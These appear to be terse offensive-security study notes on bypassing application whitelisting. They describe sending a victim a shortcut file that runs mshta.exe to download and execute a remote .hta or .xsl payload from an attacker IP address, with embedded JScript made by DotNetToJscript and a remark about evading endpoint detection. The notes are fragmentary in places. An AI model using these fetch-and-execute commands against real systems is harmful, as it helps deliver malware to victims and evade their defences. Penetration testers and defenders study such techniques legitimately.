By sending a shortcut file to execute .hta embedded with .js
Note that mshta.exe will download the .hta file before its execution, so we must still bypass any installed endpoint detection software.
shortcut.lnk
mshta.exe http://192.168.119.120/test.hta
Jscript code generate with DotNetToJscript and embed it in the hta file
See
By Extensible Stylesheet Language (.xsl) through XLS transformation (XSLT)
This application whitelisting technique can also be leveraged through a shortcut file that we provide to the victim: .lnkmshta.exe http://192.168.119.120/test.xsl